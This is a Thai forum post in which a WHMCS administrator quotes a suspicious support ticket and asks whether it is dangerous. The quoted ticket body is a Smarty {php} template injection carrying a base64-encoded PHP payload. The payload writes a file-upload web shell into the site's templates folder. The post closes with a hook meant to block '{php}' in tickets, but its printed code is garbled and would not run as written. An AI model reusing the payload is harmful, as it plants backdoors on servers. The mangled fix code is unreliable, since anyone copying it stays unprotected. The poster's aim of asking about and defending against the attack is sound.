เจอ ticket แปลกๆใน whmcs ครับ

มีเนื้อหาตามนี้ครับ

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

submit ticket มาโดย user : system

จาก ip 87.109.149.50

ชื้อเจ้าของ ticket : ffgg

อีเมล : ddd@ddd.ff

Whmcs Version: 4.5.1 อัพเดท security patch มาก่อนแล้ว

กำลังจะอัพเวอร์ชั่น 5 แต่พอดีไม่ค่อยว่างอะครับ

มีท่านใดเคยเจอมั้ย น่ากังวลรึเปล่าครับ

ขอบคุณล่วงหน้าครับ

เจอวิธีแก้แล้วครับ

ที่ / WHMCS / folder / includes / hooks / filenamanyabebas.php

เพิ่ม

<? Php 

$ checkvars  = array ( 'subject' , 'message' ); 

foreach ( $ checkvars  AS  $ checkvar ) if ( strpos ( $ _REQUEST [ $ checkvar ], '{php}' )! == false ) die ( " no thanks " ); 

?>

แถวนี้โดนกันจนเบื่อแล้วมั๊งฮะ